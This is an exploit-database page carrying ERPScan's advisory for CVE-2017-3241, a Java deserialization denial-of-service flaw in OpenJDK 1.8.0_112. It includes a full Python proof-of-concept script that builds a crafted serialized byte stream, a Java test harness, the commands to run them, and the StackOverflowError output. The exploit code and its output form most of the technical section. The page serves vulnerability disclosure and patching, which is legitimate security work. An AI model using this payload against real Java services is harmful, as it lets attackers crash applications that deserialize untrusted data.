Lucene search
+L

Oracle OpenJDK Runtime Environment Build 1.8.0_112-b15 Denial Of Service Exploit

🗓️ 23 Jan 2017 00:00:00Reported by Roman ShalymovType 
zdt
 zdt
🔗 0day.today👁 165 Views

Oracle OpenJDK Runtime Environment Build 1.8.0_112-b15 Denial Of Service Exploit. Java Serialization DoS vulnerability reported by Roman Shalymo

Related
Code
Application: Java SE

Vendor: Oracle

Bug: DoS

Reported: 23.12.2016

Vendor response: 24.12.2016

Date of Public Advisory: 17.01.2017

Reference: Oracle CPU Jan 2017

Author: Roman Shalymov



1. ADVISORY INFORMATION

Title: Oracle OpenJDK - Java Serialization DoS

Advisory ID: [ERPSCAN-17-006]

Risk: High

Advisory URL:
https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/

Date published: 17.01.2017

Vendor contacted: Oracle


2. VULNERABILITY INFORMATION


Class: Denial of Service

Remotely Exploitable: Yes

Locally Exploitable: Yes

CVE Name: CVE-2017-3241

CVSS Base Score: 9.0


3. VULNERABILITY DESCRIPTION


An attacker can cause DoS of the application which uses OpenJDK Runtime
Environment 1.8 as its core runtime engine.


4. VULNERABLE PACKAGES


OpenJDK Runtime Environment build 1.8.0_112-b15


5. SOLUTIONS AND WORKAROUNDS


Fix ObjectInputStream.skipCustomData() method, namely readObject0(false);
call in switch statement

Adress Oracle CPU January 2017

6. AUTHOR


Roman Shalymov (@shalymov)


7. TECHNICAL DESCRIPTION


An attacker can craft a malicious sequence of bytes that will cause JVM
StackOverflowError in the standard Java deserialization process if it uses
ObjectInputStream.readObject() method.



7.1. Proof of Concept



An attacker creates a malicious sequence of bytes, for example, using this
python script pwn_ser.py:



#!/usr/bin/env python2



import sys



exp = ""

#serialization header

exp += '\xac\xed\x00\x05'



exp1 = ''

exp1 += '\x72'

exp1 += '\x00\x0c'+'java.io.File'

exp1 += '\x41'*8

exp1 += '\x00'

exp1 += '\x00\x00'



exp += exp1 * 10000



sys.stdout.write(exp)



and save it in exp2.ser file



$ ./pwn_ser2.py > exp2.ser



Let's simulate deserialization process. For this purpose, we create a
simple Java program, which uses the following standard deserialization
pattern:



Serialize_read.java



import java.io.FileInputStream;

import java.io.ObjectInputStream;



public class Serialize_read {



public static void main(String args[]) throws Exception {



if(args.length < 1) {

System.out.println("usage: "+Serialize_read.class.getSimpleName()+"
[file]");

System.exit(-1);

}



FileInputStream fin = new FileInputStream(args[0]);

ObjectInputStream oin = new ObjectInputStream(fin);



try {

Object objFromDisk = oin.readObject();

String s = (String)objFromDisk;

System.out.println(s);

System.out.println("Successfully read!");

}catch(Exception e){}

System.exit(0);



}



}



Let's try to read our malicious file (we can also simulate this stuff over
network communication):



$ javac Serialize_read.java

$ java Serialize_read exp2.ser



It causes the following error dump:



Exception in thread "main" java.lang.StackOverflowError

at
java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2351)

at
java.io.ObjectInputStream$BlockDataInputStream.readUnsignedShort(ObjectInputStream.java:2834)

at
java.io.ObjectInputStream$BlockDataInputStream.readUTF(ObjectInputStream.java:2892)

at java.io.ObjectInputStream.readUTF(ObjectInputStream.java:1075)

at java.io.ObjectStreamClass.readNonProxy(ObjectStreamClass.java:684)

at java.io.ObjectInputStream.readClassDescriptor(ObjectInputStream.java:833)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1609)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)



...

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)

at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1340)

at java.io.ObjectInputStream.skipCustomData(ObjectInputStream.java:1984)

at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1628)

at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1521)



8. REPORT TIMELINE

Reported: 23.12.2016

Vendor response: 24.12.2016

Date of Public Advisory: 17.01.2017

9. REFERENCES
http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-006-oracle-openjdk-java-serialization-dos-vulnerability/

#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Jan 2017 00:00Current
9.4High risk
Vulners AI Score9.4
EPSS0.32839
165